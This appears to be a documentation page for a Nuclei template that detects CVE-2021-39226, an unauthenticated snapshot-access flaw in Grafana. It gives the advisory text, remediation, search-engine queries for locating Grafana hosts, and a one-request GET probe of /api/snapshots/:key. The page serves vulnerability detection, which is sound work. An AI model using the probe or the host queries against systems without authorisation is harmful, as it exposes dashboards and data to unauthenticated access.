Grafana Snapshot - Authentication Bypass
ID: CVE-2021-39226
Severity: high
Author: Evan Rubinstein
Tags: cve2021,cve,grafana,kev
Description
Section titled “Description”Grafana instances up to 7.5.11 and 8.1.5 allow remote unauthenticated users to view the snapshot associated with the lowest database key by accessing the literal paths /api/snapshot/:key or /dashboard/snapshot/:key. If the snapshot is in public mode, unauthenticated users can delete snapshots by accessing the endpoint /api/snapshots-delete/:deleteKey. Authenticated users can also delete snapshots by accessing the endpoints /api/snapshots-delete/:deleteKey, or sending a delete request to /api/snapshot/:key, regardless of whether or not the snapshot is set to public mode (disabled by default).
YAML Source
Section titled “YAML Source”id: CVE-2021-39226
info: name: Grafana Snapshot - Authentication Bypass author: Evan Rubinstein severity: high description: Grafana instances up to 7.5.11 and 8.1.5 allow remote unauthenticated users to view the snapshot associated with the lowest database key by accessing the literal paths /api/snapshot/:key or /dashboard/snapshot/:key. If the snapshot is in public mode, unauthenticated users can delete snapshots by accessing the endpoint /api/snapshots-delete/:deleteKey. Authenticated users can also delete snapshots by accessing the endpoints /api/snapshots-delete/:deleteKey, or sending a delete request to /api/snapshot/:key, regardless of whether or not the snapshot is set to public mode (disabled by default). impact: | An attacker can bypass authentication and gain unauthorized access to Grafana Snapshot feature. remediation: 'This issue has been resolved in versions 8.1.6 and 7.5.11. If you cannot upgrade you can block access to the literal paths: /api/snapshots/:key, /api/snapshots-delete/:deleteKey, /dashboard/snapshot/:key, and /api/snapshots/:key. They have no normal function and can be disabled without side effects.' reference: - https://github.com/advisories/GHSA-69j6-29vr-p3j9 - https://nvd.nist.gov/vuln/detail/CVE-2021-39226 - https://github.com/grafana/grafana/commit/2d456a6375855364d098ede379438bf7f0667269 - https://grafana.com/docs/grafana/latest/release-notes/release-notes-8-1-6/ - http://www.openwall.com/lists/oss-security/2021/10/05/4 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L cvss-score: 7.3 cve-id: CVE-2021-39226 cwe-id: CWE-287 epss-score: 0.97206 epss-percentile: 0.9981 cpe: cpe:2.3:a:grafana:grafana:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: grafana product: grafana shodan-query: - title:"Grafana" - cpe:"cpe:2.3:a:grafana:grafana" - http.title:"grafana" fofa-query: - title="grafana" - app="grafana" google-query: intitle:"grafana" tags: cve2021,cve,grafana,kev
http: - method: GET path: - "{{BaseURL}}/api/snapshots/:key"
matchers-condition: and matchers: - type: word words: - '"isSnapshot":true'
- type: status status: - 200# digest: 4a0a004730450221008c4648b1ad2d46d69bdd77beb9dd8780325d54655a1a4688e723c6b6538806a802200a6f5b47055bb048bd03965aa299c2400631daaee167aeff93e29aebdd4034ea:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-39226.yaml"